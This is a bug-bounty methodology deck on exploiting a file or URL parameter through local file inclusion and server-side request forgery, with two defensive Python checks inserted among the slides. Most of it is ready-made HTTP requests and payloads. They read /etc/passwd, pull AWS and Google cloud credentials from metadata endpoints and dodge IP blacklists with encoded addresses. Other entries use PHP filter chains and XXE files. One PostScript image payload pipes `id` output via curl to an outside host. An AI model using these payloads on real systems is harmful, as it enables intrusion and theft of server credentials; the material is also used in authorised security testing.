Interaction-File-URL

The document outlines various methodologies for exploiting Local File Inclusion (LFI) and Server-Side Request Forgery (SSRF) vulnerabilities. It provides specific injection techniques and payload examples to access sensitive files and internal services. The techniques include manipulating URLs, using different encoding methods, and bypassing blacklists to extract data from servers.

Interaction

File - URL
https://www.company.com

Mahmoud M. Awali
@0xAwali
My Methodology

Try To Inject ../../../../../etc/passwd OR %252fetc%252fpasswd To Get The Content Of /etc/passwd If There Is LFI

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=../../../../../etc/passwd
My Methodology

Use The Ideographic Full Stop %E3%80%82 (U+3002) Instead Of The DOT e.g. %E3%80%82%E3%80%82/etc/passwd To Get The Content Of /etc/passwd
My Methodology

Try To Inject ../../../../../etc/passwd%00 To Get The Content Of /etc/passwd If There Is LFI

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=../../../../../etc/passwd%00
My Methodology

Try To Inject ../../../../../proc/self/fd/Number-FUZZ With The Referer Header Set To <?php system('id');?> To Get RCE

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: <?php system('id');?>
Origin: https://www.company.com
Content-Length: Number

File-URL=../../../../../proc/self/fd/Number-FUZZ
My Methodology

Try To Inject jsp/etc/../../WEB-INF/web.xml To Get The DB Configuration Files If There Is LFI

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=jsp/etc/../../WEB-INF/web.xml
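As an added example, not part of the deck, this is the server-side check that the LFI payloads above (../, %252f, %E3%80%82, %00 and the WEB-INF path) are aimed at, written in Python; `BASE_DIR`, `safe_path` and `safe_relative` are names assumed here.

```python
import os
import unicodedata
from urllib.parse import unquote

BASE_DIR = "/srv/app/files"            # assumed: the only directory the endpoint may serve from
_DOT_MAP = {0x3002: ".", 0xFF61: "."}  # ideographic full stops (U+FF0E is folded by NFKC)


def safe_path(user_value, base_dir=BASE_DIR):
    """Resolve user_value inside base_dir; return the real path, or None to refuse.

    Refuses a second encoding layer (%252f), a NUL byte (the %00 truncation trick),
    an absolute path, and anything whose resolved path leaves base_dir.
    """
    decoded = unquote(user_value)               # one decode, like the web server does
    if "%" in decoded and unquote(decoded) != decoded:
        return None                             # still encoded after one decode: %252f
    if "\x00" in decoded:
        return None                             # %00 would truncate the path in C APIs
    folded = unicodedata.normalize("NFKC", decoded).translate(_DOT_MAP)  # 。。 -> ..
    if folded.startswith(("/", "\\")) or "\\" in folded:
        return None
    root = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(root, folded))
    if os.path.commonpath([root, target]) != root:
        return None                             # ../ climbed out of base_dir
    return target


def safe_relative(user_value, base_dir=BASE_DIR):
    """Same check, returning the path relative to base_dir (handy for logging and tests)."""
    target = safe_path(user_value, base_dir)
    if target is None:
        return None
    return os.path.relpath(target, os.path.realpath(base_dir))
```

The WEB-INF/web.xml payload still resolves inside BASE_DIR, so containment only protects anything when the directory holds nothing but files meant to be served.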
My Methodology

Try To Inject https://id.burpcollaborator.net To Get The Full Request If There Is SSRF

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://id.burpcollaborator.net
My Methodology

Try To Append # OR %0d%0aX:%20 To Your Domain e.g. https://id.burpcollaborator.net# To Neutralise Anything The Server Appends After The URL

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://id.burpcollaborator.net#
My Methodology

Try To Inject file:///etc/passwd To Get The Content Of /etc/passwd If There Is SSRF

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=file:///etc/passwd
My Methodology

Try To Inject file:///etc/./passwd To Get The Content Of /etc/passwd If There Is SSRF

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=file:///etc/./passwd
My Methodology

Try To Inject file://\/\/etc/passwd To Get The Content Of /etc/passwd If There Is SSRF

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=file://\/\/etc/passwd
My Methodology

Try To Inject view-source:file:///etc/passwd To Get The Content Of /etc/passwd If There Is SSRF

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=view-source:file:///etc/passwd
My Methodology

Try To Inject http://127.0.0.1:PORT To Reach Internal Services

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://127.0.0.1:PORT
My Methodology

Try To Inject http://169.254.169.254/latest/user-data To Extract The Instance User Data

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://169.254.169.254/latest/user-data
My Methodology

Try To Inject http://169.254.169.254/latest/meta-data/iam/security-credentials/ To Extract Temporary AWS Credentials

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://169.254.169.254/latest/meta-data/iam/security-credentials/
My Methodology

Try To Inject http://100.100.100.200/latest/meta-data/ OR http://127.0.0.1:2379/v2/keys/?recursive=true To Extract Credentials

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://127.0.0.1:2379/v2/keys/?recursive=true
My Methodology

Try To Inject https://kubernetes.default.svc/metrics To Extract Data From The Kubernetes API

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://kubernetes.default.svc/metrics
My Methodology

Try To Inject http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true To Grab All Internal Metadata

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
My Methodology

Try To Use 169.254.169.254.xip.io Instead Of 169.254.169.254 To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://169.254.169.254.xip.io/latest/user-data
My Methodology

Try To Use base36(int('254.169.254.169')) e.g. http://1ynrnhl.xip.io/ Instead Of 169.254.169.254 To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://1ynrnhl.xip.io/latest/user-data
My Methodology

Try To Use http://www.company.com.1ynrnhl.xip.io/ Instead Of 169.254.169.254 To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://www.company.com.1ynrnhl.xip.io/latest/user-data
My Methodology

Try To Change The HTTP Version From 1.1 To HTTP/0.9 And Remove The Host Header To Bypass The Blacklist

POST /Interaction-File-URL HTTP/0.9
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://169.254.169.254/latest/meta-data/iam/security-credentials/
My Methodology

Try To Drop The Zeros e.g. http://127.0.0.1 → http://127.1 To Bypass The Blacklist
My Methodology

Try To Add Extra Zeros e.g. https://127.000.000.00000000001 To Bypass The Blacklist
My Methodology

Try To Use Dotted Decimal With Overflow e.g. http://425.510.425.510/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://425.510.425.510/
My Methodology

Try To Use Dotless Decimal e.g. http://2852039166/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://2852039166/
My Methodology

Try To Use Dotless Decimal With Overflow e.g. http://7147006462/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://7147006462/
My Methodology

Try To Use Dotted Hexadecimal e.g. http://0xA9.0xFE.0xA9.0xFE/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0xA9.0xFE.0xA9.0xFE/
My Methodology

Try To Use Dotless Hexadecimal e.g. http://0xA9FEA9FE/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0xA9FEA9FE/
My Methodology

Try To Use Dotless Hexadecimal With Overflow e.g. http://0x41414141A9FEA9FE/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0x41414141A9FEA9FE/
My Methodology

Try To Use Dotted Octal e.g. http://0251.0376.0251.0376/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0251.0376.0251.0376/
My Methodology

Try To Use Dotted Octal With Padding e.g. http://0251.00376.000251.0000376/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0251.00376.000251.0000376/
My Methodology

Try To Mix Them e.g. Decimal Overflow + Hex + Octal e.g. http://425.254.0xa9.0376/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://425.254.0xa9.0376/
My Methodology

Try To Convert Only Parts Of The Address e.g. Octal + Hex + 2-Byte Wide Dotless Decimal e.g. http://0251.0xfe.43518/ OR https://0251.254.169.254 To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0251.0xfe.43518/
My Methodology

Try To Use An IPv4-Compatible IPv6 Address e.g. http://[::169.254.169.254]/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://[::169.254.169.254]/
My Methodology

Try To Use An IPv4-Mapped IPv6 Address e.g. http://[::ffff:169.254.169.254]/ To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://[::ffff:169.254.169.254]/
My Methodology

Try To Use http://127.127.127.127 To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://127.127.127.127/
My Methodology

Try To Use http://0.0.0.0:PORT To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://0.0.0.0:PORT/
My Methodology

Try To Use http://[::1]:PORT e.g. http://[::1]:2375/containers/json OR http://[::] To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://[::1]:2375/containers/json
My Methodology

Try To Use An HTTP Redirection To Bypass The Blacklist e.g. http://nicob.net/redir-http-I.P.v.4:PORT Will Redirect You To I.P.v.4:PORT

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://nicob.net/redir-http-I.P.v.4:PORT
List Of Patterns To Bypass The Whitelist

http://google.com:80+&@127.88.23.245:22/#[email protected]:80/
http://127.88.23.245:22/+&@google.com:80#[email protected]:80/
http://google.com:80+&@google.com:80#[email protected]:22/
http://127.88.23.245:22/[email protected]:80/
http://127.88.23.245:22/#@www.google.com:80/
http://google.com:80\\@127.88.23.245:22
http://127.1.1.1:80\@127.2.2.2:80/
http://127.1.1.1:80\@@127.2.2.2:80/
http://127.1.1.1:80:\@@127.2.2.2:80/
http://127.1.1.1:80#\@127.2.2.2:80/
http://169。254。169。254/
http://⑯⑨。②⑤④。⑯⑨。②⑤④/
http://⓪ⓧⓐ⑨。⓪ⓧⓕⓔ。⓪ⓧⓐ⑨。⓪ⓧⓕⓔ:80/
http://⓪ⓧⓐ⑨ⓕⓔⓐ⑨ⓕⓔ:80/
http://②⑧⑤②⓪③⑨①⑥⑥:80/
http://④②⑤。⑤①⓪。④②⑤。⑤①⓪:80/
http://⓪②⑤①。⓪③⑦⑥。⓪②⑤①。⓪③⑦⑥:80/
http://⓪⓪②⑤①。⓪⓪⓪③⑦⑥。⓪⓪⓪⓪②⑤①。⓪⓪⓪⓪⓪③⑦⑥:80/
http://[::①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://[::ⓕⓕⓕⓕ:①⑥⑨。②⑤④。⑯⑨。②⑤④]:80/
http://⓪ⓧⓐ⑨。⓪③⑦⑥。④③⑤①⑧:80/
http://⓪ⓧⓐ⑨。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⑯⑥⑧⑨⑥⑥②:80/
http://⓪⓪②⑤①。⓪ⓧⓕⓔ。④③⑤①⑧:80/
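The blacklist bypasses above all rely on the guard matching strings while the fetching library resolves the host to an address. As an added example, not from the deck, this Python guard canonicalises the host first (dotted or dotless decimal, overflow, hex, octal, mixed radix, dropped or padded zeros, IPv4-compatible and IPv4-mapped IPv6, circled digits and ideographic full stops) and only then checks the address and the scheme; `DENY_NETS`, `classify` and the other names are assumed here, and the deny list is an assumed policy.

```python
import ipaddress
import re
import unicodedata
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}       # rejects file:, gopher:, dict:, sftp:, php: wrappers

# Assumed policy: 169.254/16 holds the cloud metadata services, 100.64/10 the
# 100.100.100.200 endpoint, the rest loopback, private and unspecified space.
DENY_NETS = [ipaddress.ip_network(n) for n in (
    "0.0.0.0/8", "10.0.0.0/8", "100.64.0.0/10", "127.0.0.0/8",
    "169.254.0.0/16", "172.16.0.0/12", "192.168.0.0/16", "::/128", "::1/128",
)]

_DOT_MAP = {0x3002: ".", 0xFF61: "."}   # ideographic full stops; U+FF0E is folded by NFKC
_PART = re.compile(r"^(0x[0-9a-f]+|0[0-7]*|[1-9][0-9]*)$", re.IGNORECASE)


def _part_value(part):
    """Decode one dotted component as inet_aton does: 0x = hex, leading 0 = octal."""
    if not _PART.match(part):
        return None
    if part[:2].lower() == "0x":
        return int(part[2:], 16)
    if len(part) > 1 and part[0] == "0":
        return int(part, 8)
    return int(part, 10)


def ipv4_from_host(host):
    """IPv4 address a lenient inet_aton-style parser derives from host, or None.

    With fewer than four parts the last one covers the remaining bytes
    (127.1 -> 127.0.0.1, 0251.0xfe.43518 -> 169.254.169.254). Oversized parts are
    wrapped to their width, as parsers that silently truncate do, so
    425.510.425.510 and 7147006462 both become 169.254.169.254.
    """
    parts = host.split(".")
    if not 1 <= len(parts) <= 4:
        return None
    values = [_part_value(p) for p in parts]
    if any(v is None for v in values):
        return None
    *lead, last = values
    width = 4 - len(lead)                    # bytes covered by the last part
    n = 0
    for v in lead:
        n = (n << 8) | (v & 0xFF)
    n = (n << (8 * width)) | (last & ((1 << (8 * width)) - 1))
    return ipaddress.IPv4Address(n)


def canonical_ip(host):
    """Map a URL host to the address it designates, or None for a DNS name."""
    host = unicodedata.normalize("NFKC", host).translate(_DOT_MAP)  # ⑯⑨。②⑤④ -> 169.254
    ip4 = ipv4_from_host(host)
    if ip4 is not None:
        return ip4
    try:
        ip6 = ipaddress.IPv6Address(host)
    except ipaddress.AddressValueError:
        return None
    if ip6.ipv4_mapped is not None:          # [::ffff:169.254.169.254]
        return ip6.ipv4_mapped
    if 1 < int(ip6) < (1 << 32):             # [::169.254.169.254], IPv4-compatible form
        return ipaddress.IPv4Address(int(ip6))
    return ip6


def ip_verdict(ip):
    """'deny' if ip falls in any denied range, else 'allow'."""
    return "deny" if any(ip in net for net in DENY_NETS) else "allow"


def classify(url):
    """Return 'deny', 'allow', or 'resolve'.

    'resolve' means the host is a name: run ip_verdict on every address the resolver
    returns and connect to that exact address, never to a second lookup (the xip.io
    and DNS rebinding entries in the deck exist to split those two steps).
    """
    try:
        parts = urlsplit(url)
        host = parts.hostname                # strips userinfo before '@' and brackets
    except ValueError:
        return "deny"
    if parts.scheme.lower() not in ALLOWED_SCHEMES or not host:
        return "deny"
    ip = canonical_ip(host)
    if ip is None:
        return "resolve"
    return ip_verdict(ip)


def verdict_for_resolved(addresses):
    """Second stage for names: every resolver answer must pass."""
    verdicts = [ip_verdict(ipaddress.ip_address(a)) for a in addresses]
    return "allow" if verdicts and all(v == "allow" for v in verdicts) else "deny"
```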
My Methodology

Try To Use http://www.company.com# @me.com To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://www.company.com# @me.com
My Methodology

Try To Use Protocol Wrappers Other Than HTTP OR HTTPS e.g. SSH, SFTP, POP3, IMAP, SMTP, FTP, DICT, GOPHER OR TFTP e.g. sftp://me.com To Bypass The Blacklist

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=sftp://me.com
Try To Use This Payload

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=php://filter/convert.iconv.WINDOWS-936%2FCP1388|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.iconv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%20read/resource=file:///etc/passwd
Try To Use This Payload

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=php://filter/convert.iconv.WINDOWS-936%2FCP1388|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.base64-encode|convert.base64-encode|convert.base64-encode|convert.iconv.UTF8%2FIBM4899%2F%2FTRANSLIT|convert.quoted-printable-encode|convert.iconv.WINDOWS-936%2FCP1388/resource=/etc/passwd%20#@%20read/resource=file:///etc/passwd%20#[]@%20127.0.0.1:1337/index.php?url=file:///etc/passwd
My Methodology

If You Got Blind SSRF Over HTTP OR HTTPS, Try To Request Subdomains That Do Not Resolve Publicly, Because Some Subdomains Are Reachable Only Over The VPN
My Methodology

If You Got Blind SSRF Over HTTP OR HTTPS, Try To Request An Internal URL That Performs Another SSRF Which Calls Out To Your Domain e.g. If Apache Solr Is Running Internally

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://apache-solr.company.com/solr/gettingstarted/select?q={!xmlparser v='<!DOCTYPE a SYSTEM "http://me.com/"'><a></a>'
My Methodology

If There Is ASP.NET Try To Inject .+./.+./web.config OR http://127.0.0.1:[0-65535]/[Home|Admin|Administrator]/Index? To Get The Admin Page

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://127.0.0.1:PORT/Home/Index?
Reading From Remote XML File

root@mine:~# cat file.xml
<?xml version="1.0"?>
<!DOCTYPE root [
<!ENTITY read SYSTEM "file:///etc/passwd">
]>
<root><email>&read;</email></root>

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/file.xml
Reading From Remote mp4 File

root@mine:~# cat file.mp4
#EXTM3U
#EXT-X-MEDIA-SEQUENCE:0
#EXTINF:10.0,
http://me.com/2.mp4
#EXT-X-ENDLIST

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/file.mp4
Reading From Remote Image

root@mine:~# cat file.jpg
%!PS
userdict /setpagedevice undef
save
legal
{null restore} stopped {pop} if
{legal} stopped {pop} if
restore
mark /OutputFile (%pipe%curl${IFS}me.com/`id`)
currentdevice putdeviceprops

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/file.jpg
Interaction With Remote URL

root@mine:~# cat index.php
<?php
header("Location: http://[::]:22/");
?>

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/index.php
Interaction With Remote URL II

root@mine:~# cat index.php
<?php
header("Location: http://169.254.169.254/latest/meta-data/", TRUE, 303);
?>

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=https://me.com/index.php
Interaction With Remote URL III

Steps To Reproduce:

1 - Set Your Domain e.g. http://me.com As The Remote URL And Run Wireshark On It
2 - Check Whether There Is A Range OR Content-Range Header
3 - Respond With e.g. 2M Bytes AND Upload A File Smaller Than 2M Bytes On http://me.com
4 - The Company Will Re-request The Rest Of The 2M Bytes
5 - Redirect The Second Request To e.g. http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token
My Methodology

If There Is SSRF Try To Inject http://brutelogic.com.br/poc.svg To Get XSS

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://brutelogic.com.br/poc.svg
My Methodology

If You Can Embed Videos From Services e.g. Vimeo, YouTube, Twitter, AND Facebook, Try To Inject XSS Payloads In Their Title AND Description To Get XSS
My Methodology

Try To Use An Open Redirection To Bypass The Blacklist e.g. http://www.company.com/redirect?url=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json To Extract Google Metadata

POST /Interaction-File-URL HTTP/1.1
Host: www.company.com
User-Agent: Mozilla/5.0
Content-Type: application/x-www-form-urlencoded
Referer: https://previous.com/path
Origin: https://www.company.com
Content-Length: Number

File-URL=http://www.company.com/redirect?url=http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token?alt=json
My Methodology

Try To Use The DNS Rebinding Technique By Using Tools e.g. Singularity OR rebind.py To Bypass The Blacklist

Steps To Reproduce:

2 - Open Your Terminal
3 - Write This Command
./rebind.py --ip1=Blacklist --ip2=Allowed --scheme=PORT
Mark Valenzia (Tweet) #BugBounty #BugBountyTip
Hack3rScr0lls (Tweet) #BugBounty #BugBountyTip
Thank You
Mahmoud M. Awali
@0xAwali